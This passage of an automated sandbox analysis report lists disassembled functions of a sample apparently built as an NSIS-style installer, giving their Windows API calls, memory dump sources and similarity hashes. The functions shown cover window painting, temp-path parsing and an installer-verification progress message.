                                                                                                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040474F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                  • String ID: : Completed$N$gD@
                                                                                                                                                                                                                                  • API String ID: 3103080414-1696006015
                                                                                                                                                                                                                                  • Opcode ID: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
                                                                                                                                                                                                                                  • Instruction ID: c6d0c18f0759a08483bb7b351ebc970df30fae26c4fd20534e815ca7361c8267
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB6171B1900209BFDF10AF64DD85AAA7B69FB85314F00813AFA05B72D0D7789D51DB98
                                                                                                                                                                                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                  • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                  • String ID: F
                                                                                                                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                  • Opcode ID: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
                                                                                                                                                                                                                                  • Instruction ID: d01d0d5cc9b133415a9533ecc51a0e37331fb978861fbb258d472761deeb6ec3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80418C71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB34D955DFA4
                                                                                                                                                                                                                                  Function 00406027 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061C2,?,?), ref: 00406062
                                                                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 0040606B
                                                                                                                                                                                                                                    • Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
                                                                                                                                                                                                                                    • Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 00406088
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004060A6
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 004060E1
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060F0
                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406128
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 0040617E
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040618F
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406196
                                                                                                                                                                                                                                    • Part of subcall function 00405ED1: GetFileAttributesW.KERNELBASE(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                                                                                                                                                                                    • Part of subcall function 00405ED1: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                                  • API String ID: 2171350718-461813615
                                                                                                                                                                                                                                  • Opcode ID: 20a50c53921074daec6adbaee4639feac19fafd8a1c8ddf172338cbd77f89c80
                                                                                                                                                                                                                                  • Instruction ID: 12f543f5511dcafe86fd679503ff52a70677b7710d95204b96aa1b9436a2079a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20a50c53921074daec6adbaee4639feac19fafd8a1c8ddf172338cbd77f89c80
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD310271200715BFC2206B659D48F2B3AACDF41714F16003ABD86BA2D3DA3DAD1186BD
                                                                                                                                                                                                                                  Function 00404398 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004043B5
                                                                                                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004043F3
                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004043FF
                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 0040440B
                                                                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 0040441E
                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040442E
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404448
                                                                                                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404452
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                                                                                                  • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                                                                                                                                                  • Instruction ID: 9b2ff1ab0d94660d7576f8ed4a98babdba82e7b09994482354a54f078556bf7c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B2162715007089BCB20DF38D948B5BBBF8AF80714B04892EE996A26E1D734E904CF59
                                                                                                                                                                                                                                  Function 004026E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                                                                                                                                                                                    • Part of subcall function 00405FB2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FC8
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                                  • String ID: 9
                                                                                                                                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                                                                                                                                  • Opcode ID: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
                                                                                                                                                                                                                                  • Instruction ID: 536e03bdd217ed40317c2037eab2912bbb9466327a1cdf3ab0e42e9fe4cfd002
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2751F975D00219EBDF20DF95CA89AAEBB79FF04304F50817BE501B62D0E7B49D828B58
                                                                                                                                                                                                                                  Function 0040668A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
                                                                                                                                                                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
                                                                                                                                                                                                                                  • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406701
                                                                                                                                                                                                                                  • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406714
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                                                                                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                  • API String ID: 589700163-4010320282
                                                                                                                                                                                                                                  • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                                                                                                                                                  • Instruction ID: c93b7236ce9398e1af64c827f7f3df25a4e663042e3c0a86589bb20fd507ce77
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6111CB2580061195DB3037548C84B7762E8EF547A4F52443FED86B32C0E77D5CA286BD
                                                                                                                                                                                                                                  Function 00404CEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D07
                                                                                                                                                                                                                                  • GetMessagePos.USER32 ref: 00404D0F
                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404D29
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D3B
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D61
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                  • String ID: f
                                                                                                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                  • Instruction ID: 38a9b76ebff3d9b0285b36f379b71c5e366e7bff37b4726e352de3fe70b617dc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF014C71900219BBDB10DBA4DD85BFEBBB8AF95B11F10012BBA50B61C0D6B49A058BA5
                                                                                                                                                                                                                                  Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00019C00,00000064,000C230D), ref: 00402F74
                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00402F84
                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • verifying installer: %d%%, xrefs: 00402F7E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                  • String ID: verifying installer: %d%%
